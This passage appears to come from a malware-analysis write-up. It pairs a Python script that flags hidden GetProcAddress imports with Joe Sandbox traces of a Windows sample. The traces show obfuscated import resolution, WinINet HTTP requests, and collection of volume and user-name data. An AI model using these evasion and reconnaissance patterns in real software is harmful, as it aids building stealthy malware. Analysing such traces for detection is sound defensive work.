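and profile, per module handle, how many GetProcAddress names were visible
as strings and how many were passed as opaque 32-bit values."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*?)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")   # Joe prints raw 32-bit arguments as 8 hex digits


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str


def parse_api_lines(text):
    """One ApiCall per line in the bullet format; any other line is ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref").upper()))
    return calls


def arg_kind(arg):
    """'unknown' for '?', 'number' for a raw 32-bit value, 'string' for a rendered string."""
    if arg == "?":
        return "unknown"
    return "number" if HEX32.match(arg) else "string"


def resolution_profile(calls):
    """GetProcAddress calls grouped by module handle (the first argument)."""
    prof = defaultdict(lambda: {"total": 0, "named": [], "hidden": 0})
    for c in calls:
        if c.api != "GetProcAddress" or len(c.args) < 2:
            continue
        entry = prof[c.args[0]]
        entry["total"] += 1
        if arg_kind(c.args[1]) == "string":
            entry["named"].append(c.args[1])
        else:
            entry["hidden"] += 1
    return dict(prof)


def hidden_name_ratio(calls):
    """Share of GetProcAddress calls whose name argument was not a rendered string."""
    gpa = [c for c in calls if c.api == "GetProcAddress" and len(c.args) >= 2]
    if not gpa:
        return 0.0
    return sum(arg_kind(c.args[1]) != "string" for c in gpa) / len(gpa)


def looks_like_hidden_imports(calls, min_calls=10, min_ratio=0.8):
    """Triage heuristic (an assumption made for this example, not a Joe Sandbox rule):
    many GetProcAddress calls, most of them with names Joe could not print as strings."""
    gpa = sum(1 for c in calls if c.api == "GetProcAddress")
    return gpa >= min_calls and hidden_name_ratio(calls) >= min_ratio


# Constructed sample: eight lines copied from the APIs list of the eb9bb0 entry above.
SAMPLE = """
• GetProcAddress.KERNEL32(74DD0000,01BF3150), ref: 00EB9BF1
• GetProcAddress.KERNEL32(74DD0000,01BF31E0), ref: 00EB9C0A
• GetProcAddress.KERNEL32(74DD0000,01BF3000), ref: 00EB9C22
• LoadLibraryA.KERNEL32(01BF3348,?,00EB6CA0), ref: 00EB9DEA
• LoadLibraryA.KERNEL32(01BF3360,?,00EB6CA0), ref: 00EB9DFB
• GetProcAddress.KERNEL32(75A70000,01BF3330), ref: 00EB9E52
• GetProcAddress.KERNEL32(76E90000,01BF9CD8), ref: 00EB9EEF
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00EB9F06
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print(Counter(c.api for c in calls))
    for handle, entry in resolution_profile(calls).items():
        print(handle, entry)
    print("hidden-name ratio:", round(hidden_name_ratio(calls), 2))
```

Run over the full 32-line list above the ratio is 31/32; on the eight-line sample it is 5/6, so the default threshold of ten calls is not met while a lower one is, which is the reason both parameters are exposed.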

                                Control-flow Graph (function ea4610; the executed / not-executed colouring of the graph did not survive extraction)
                                Basic blocks and branches: ea4610-ea46e5 (RtlAllocateHeap) -> ea46f0-ea46f6 (loop head) -> either ea46fc-ea479a (loop body, back to ea46f0) or ea479f-ea47f9 (VirtualProtect): an allocation, a loop over the allocation, then the protection change.
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA465E
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EA47EC
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., 30 xrefs in three runs spaced 0xB bytes apart: 00EA4617, 00EA4622, 00EA462D, 00EA4638, 00EA4643, 00EA4667, 00EA4672, 00EA467D, 00EA4688, 00EA4693, 00EA46A7, 00EA46B2, 00EA46BD, 00EA46C8, 00EA46D3, 00EA46FC, 00EA4707, 00EA4712, 00EA471D, 00EA4728, 00EA4763, 00EA476E, 00EA4779, 00EA4784, 00EA478F, 00EA479F, 00EA47AA, 00EA47B5, 00EA47C0, 00EA47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 74b06c01683802eacb3bee9e88f55bded602d870c7662574519a84b99c168779
                                • Instruction ID: 947287d428edbe786ed3460abf197c43e78879f6ebcc2a238956ef7bb5d76a31
                                • Opcode Fuzzy Hash: 74b06c01683802eacb3bee9e88f55bded602d870c7662574519a84b99c168779
                                • Instruction Fuzzy Hash: D641EF637C2744EEC729FBA48A4EF9D76665FC6700F507048A81076280FBF2768347A6

                                 Control-flow Graph (rendered as an image in the original report; legend: executed / not executed blocks)
                                 control_flow_graph 1033 ea62d0-ea635b call ebaab0 call ea4800 call ebaa50 InternetOpenA StrCmpCA 1040 ea635d 1033->1040 1041 ea6364-ea6368 1033->1041 1040->1041 1042 ea6559-ea6575 call ebaab0 call ebab10 * 2 1041->1042 1043 ea636e-ea6392 InternetConnectA 1041->1043 1061 ea6578-ea657d 1042->1061 1044 ea6398-ea639c 1043->1044 1045 ea654f-ea6553 InternetCloseHandle 1043->1045 1047 ea63aa 1044->1047 1048 ea639e-ea63a8 1044->1048 1045->1042 1050 ea63b4-ea63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 ea63e8-ea63ec 1050->1052 1053 ea6545-ea6549 InternetCloseHandle 1050->1053 1056 ea63ee-ea640f InternetSetOptionA 1052->1056 1057 ea6415-ea6455 HttpSendRequestA HttpQueryInfoA 1052->1057 1053->1045 1056->1057 1059 ea647c-ea649b call eb8ad0 1057->1059 1060 ea6457-ea6477 call ebaa50 call ebab10 * 2 1057->1060 1066 ea6519-ea6539 call ebaa50 call ebab10 * 2 1059->1066 1067 ea649d-ea64a4 1059->1067 1060->1061 1066->1061 1070 ea64a6-ea64d0 InternetReadFile 1067->1070 1071 ea6517-ea653f InternetCloseHandle 1067->1071 1076 ea64db 1070->1076 1077 ea64d2-ea64d9 1070->1077 1071->1053 1076->1071 1077->1076 1080 ea64dd-ea6515 call ebacc0 call ebabb0 call ebab10 1077->1080 1080->1070
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                  • Part of subcall function 00EA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • InternetOpenA.WININET(00EC0DFF,00000001,00000000,00000000,00000000), ref: 00EA6331
                                • StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA6353
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA6385
                                • HttpOpenRequestA.WININET(00000000,GET,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA63D5
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EA640F
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA6421
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EA644D
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EA64BD
                                • InternetCloseHandle.WININET(00000000), ref: 00EA653F
                                • InternetCloseHandle.WININET(00000000), ref: 00EA6549
                                • InternetCloseHandle.WININET(00000000), ref: 00EA6553
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 60236f361922bda665a52e45a881589c18a3fedecb160f1402cbaec1006e87ef
                                • Instruction ID: 5933508bcda276b3f974bb02aaf6c8f1d5ad42a9bd2054eefa9f2609a34f988f
                                • Opcode Fuzzy Hash: 60236f361922bda665a52e45a881589c18a3fedecb160f1402cbaec1006e87ef
                                • Instruction Fuzzy Hash: 58715C71A00218ABDF24DB90DC99FEE77B5BB49700F1494A8F11A7B1C4DBB16A84CF51

                                 Control-flow Graph (rendered as an image in the original report; legend: executed / not executed blocks)
                                 control_flow_graph 1356 eb7690-eb76da GetWindowsDirectoryA 1357 eb76dc 1356->1357 1358 eb76e3-eb7757 GetVolumeInformationA call eb8e90 * 3 1356->1358 1357->1358 1365 eb7768-eb776f 1358->1365 1366 eb778c-eb77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 eb7771-eb778a call eb8e90 1365->1367 1369 eb77a9-eb77b6 call ebaa50 1366->1369 1370 eb77b8-eb77e8 wsprintfA call ebaa50 1366->1370 1367->1365 1377 eb780e-eb781e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EB76D2
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EB770F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7793
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB779A
                                • wsprintfA.USER32 ref: 00EB77D0
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: eb963edc84e65f59d0c01af92562cfb2b594dce1aa124e2620196071e6d3cdfb
                                • Instruction ID: 6bca4a28a59e92b16da4132e7225fb26fabd03e479154052ee883807de3bd9d2
                                • Opcode Fuzzy Hash: eb963edc84e65f59d0c01af92562cfb2b594dce1aa124e2620196071e6d3cdfb
                                • Instruction Fuzzy Hash: 834182B1D04358ABDB14DB94DC45BDEBBB8AF48704F1050A9F609BB280D774AA84CBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EA11B7), ref: 00EB7A10
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7A17
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EB7A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: b0ed1d6703b2193bc0606ac5151ab252298b1ace6e82b2132315adf0b701ce70
                                • Instruction ID: 7a1cb9322a05c9d23b79a13eca36a1bf6eddfc41fad4b66308b8d006a7e17a4a
                                • Opcode Fuzzy Hash: b0ed1d6703b2193bc0606ac5151ab252298b1ace6e82b2132315adf0b701ce70
                                • Instruction Fuzzy Hash: 00F04FB1944309EBC714DF98DD49BAEBBB8EB45711F10022AF625A2780C7755540CBA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 3f6a05f321f3310462770d2303652dfb6edcd565cf7c580fad7744e0b4b3e3bd
                                • Instruction ID: e505980b8ec39f50ef08a7fcbad4708dd093387b50770331282e4696844971cc
                                • Opcode Fuzzy Hash: 3f6a05f321f3310462770d2303652dfb6edcd565cf7c580fad7744e0b4b3e3bd
                                • Instruction Fuzzy Hash: ECD05E7490130C9BCB14DFE0A84D6DDBB79FB0C325F0005A4D91572380EA306481CB65

                                 Control-flow Graph (rendered as an image in the original report; legend: executed / not executed blocks)
                                 control_flow_graph 633 eb9f20-eb9f2a 634 eb9f30-eba341 GetProcAddress * 43 633->634 635 eba346-eba3da LoadLibraryA * 8 633->635 634->635 636 eba3dc-eba451 GetProcAddress * 5 635->636 637 eba456-eba45d 635->637 636->637 638 eba463-eba521 GetProcAddress * 8 637->638 639 eba526-eba52d 637->639 638->639 640 eba5a8-eba5af 639->640 641 eba52f-eba5a3 GetProcAddress * 5 639->641 642 eba647-eba64e 640->642 643 eba5b5-eba642 GetProcAddress * 6 640->643 641->640 644 eba72f-eba736 642->644 645 eba654-eba72a GetProcAddress * 9 642->645 643->642 646 eba738-eba7ad GetProcAddress * 5 644->646 647 eba7b2-eba7b9 644->647 645->644 646->647 648 eba7bb-eba7e7 GetProcAddress * 2 647->648 649 eba7ec-eba7f3 647->649 648->649 650 eba825-eba82c 649->650 651 eba7f5-eba820 GetProcAddress * 2 649->651 652 eba922-eba929 650->652 653 eba832-eba91d GetProcAddress * 10 650->653 651->650 654 eba92b-eba988 GetProcAddress * 4 652->654 655 eba98d-eba994 652->655 653->652 654->655 656 eba9ae-eba9b5 655->656 657 eba996-eba9a9 GetProcAddress 655->657 658 ebaa18-ebaa19 656->658 659 eba9b7-ebaa13 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01BE5C90), ref: 00EB9F3D
                                • GetProcAddress.KERNEL32(74DD0000,01BE5D30), ref: 00EB9F55
                                • GetProcAddress.KERNEL32(74DD0000,01BFA810), ref: 00EB9F6E
                                • GetProcAddress.KERNEL32(74DD0000,01BFA870), ref: 00EB9F86
                                • GetProcAddress.KERNEL32(74DD0000,01BFA888), ref: 00EB9F9E
                                • GetProcAddress.KERNEL32(74DD0000,01BFA828), ref: 00EB9FB7
                                • GetProcAddress.KERNEL32(74DD0000,01BEC7C0), ref: 00EB9FCF
                                • GetProcAddress.KERNEL32(74DD0000,01BFE000), ref: 00EB9FE7
                                • GetProcAddress.KERNEL32(74DD0000,01BFDF88), ref: 00EBA000
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE38), ref: 00EBA018
                                • GetProcAddress.KERNEL32(74DD0000,01BFE048), ref: 00EBA030
                                • GetProcAddress.KERNEL32(74DD0000,01BE5DF0), ref: 00EBA049
                                • GetProcAddress.KERNEL32(74DD0000,01BE5DD0), ref: 00EBA061
                                • GetProcAddress.KERNEL32(74DD0000,01BE5CD0), ref: 00EBA079
                                • GetProcAddress.KERNEL32(74DD0000,01BE5CB0), ref: 00EBA092
                                • GetProcAddress.KERNEL32(74DD0000,01BFDD90), ref: 00EBA0AA
                                • GetProcAddress.KERNEL32(74DD0000,01BFDDA8), ref: 00EBA0C2
                                • GetProcAddress.KERNEL32(74DD0000,01BECAB8), ref: 00EBA0DB
                                • GetProcAddress.KERNEL32(74DD0000,01BE5AB0), ref: 00EBA0F3
                                • GetProcAddress.KERNEL32(74DD0000,01BFDF58), ref: 00EBA10B
                                • GetProcAddress.KERNEL32(74DD0000,01BFDDC0), ref: 00EBA124
                                • GetProcAddress.KERNEL32(74DD0000,01BFDFD0), ref: 00EBA13C
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE20), ref: 00EBA154
                                • GetProcAddress.KERNEL32(74DD0000,01BE5B90), ref: 00EBA16D
                                • GetProcAddress.KERNEL32(74DD0000,01BFE030), ref: 00EBA185
                                • GetProcAddress.KERNEL32(74DD0000,01BFE060), ref: 00EBA19D
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE68), ref: 00EBA1B6
                                • GetProcAddress.KERNEL32(74DD0000,01BFDFA0), ref: 00EBA1CE
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE80), ref: 00EBA1E6
                                • GetProcAddress.KERNEL32(74DD0000,01BFE018), ref: 00EBA1FF
                                • GetProcAddress.KERNEL32(74DD0000,01BFDEF8), ref: 00EBA217
                                • GetProcAddress.KERNEL32(74DD0000,01BFDD78), ref: 00EBA22F
                                • GetProcAddress.KERNEL32(74DD0000,01BFDDF0), ref: 00EBA248
                                • GetProcAddress.KERNEL32(74DD0000,01BFB700), ref: 00EBA260
                                • GetProcAddress.KERNEL32(74DD0000,01BFDDD8), ref: 00EBA278
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE50), ref: 00EBA291
                                • GetProcAddress.KERNEL32(74DD0000,01BE5CF0), ref: 00EBA2A9
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE08), ref: 00EBA2C1
                                • GetProcAddress.KERNEL32(74DD0000,01BE58F0), ref: 00EBA2DA
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE98), ref: 00EBA2F2
                                • GetProcAddress.KERNEL32(74DD0000,01BFDEB0), ref: 00EBA30A
                                • GetProcAddress.KERNEL32(74DD0000,01BE5950), ref: 00EBA323
                                • GetProcAddress.KERNEL32(74DD0000,01BE5970), ref: 00EBA33B
                                • LoadLibraryA.KERNEL32(01BFDEC8,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA34D
                                • LoadLibraryA.KERNEL32(01BFDEE0,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA35E
                                • LoadLibraryA.KERNEL32(01BFDF70,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA370
